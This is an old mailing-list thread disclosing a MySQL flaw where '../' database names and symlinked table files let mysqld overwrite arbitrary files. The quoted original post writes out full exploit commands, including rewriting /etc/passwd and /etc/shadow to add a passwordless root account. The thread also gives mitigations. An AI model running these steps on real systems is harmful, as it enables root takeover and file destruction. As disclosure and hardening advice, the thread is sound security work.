Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit)

[JT <luser () AHAB COM>]

Yes, this does work with current mysql.  I did manage to overwrite a
file to which mysql daemon had permissions.

When I tried using these strategies to overwrite a file to which
mysqld didn't have permissions (~/etc/master.passwd), I ended up getting:

ERROR 1: Can't create/write to file '/../tmp/fucked.MYD' (Errcode: 13)

Which is another reason that running mysqld as root is like running a
steeplechase with a loaded gun in your mouth.

On Tue, Mar 20, 2001 at 12:02:58PM +1100, Scott Fagg wrote:
> Works for mysql 3.23.32 running as root.
>
> I used:
>
> mysql -u root ../../../../tmp
> create table yikes(w int(4));
>
> This created /tmp/yikes.*
>
>
> > > > "Pavlov, Lesha" <lesha () NN RU> 19/3/01 4:32:37 am >>>
> Anybody, who get login and password to mysql can use it as DoS or r00t
> exploit because mysql accepts '../blah-blah' as valid database name and
> each table represented by 3 files tablename.ISD, tablename.ISM and
> tablename.frm, But, when mysqld checks table already exists or not
> exists, it checks _only_ tablename.frm :
>
> Usage this "vulnerable features of mysql" to make big DoS (Will
> Overwrite any file you wish):
> $ cd /var/tmp
> $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table qqq(www int);
> \q
> $
> File /some/file/you/wish/to/overwrite will be overwritten.
>
> Usage as r00t exploit:
> $ cd /var/tmp
> $ ln -s /etc/passwd gotcha.ISD
> $ ln -s /etc/shadow make_me_r00t.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table gotcha(qqq varchar(255));
> create table make_me_r00t(qqq varchar(255));
> insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
> insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
> \q
> $
> You getta r00t now!
>
> Recomendations:
> * Patch mysql to when check table presents, it checks all
> tablename.{ISD,ISM,frm} files, not only tablename.frm
> * Patch mysql to treat database names, started by '..' as incorrect
> database names.
> * And Main recomendation - do not run mysqld as root!!!
>
> Patches:
>  not yet
>
> Workaround:
> chowns existing database tables to a normal user and run mysqld as this
> unprivileged user - it will be better solution!.
>
> Vulnerable versions:
> This DoS/exploit tested on mysql-3.20.32a but i see another versions of
> mysql also vulnerabile.
>
> Comments:
> Mysql dox recomends dont run mysqld as root, but People from RedHat
> didnt read mysql dox - mysql istalled from rpm is vulnerable.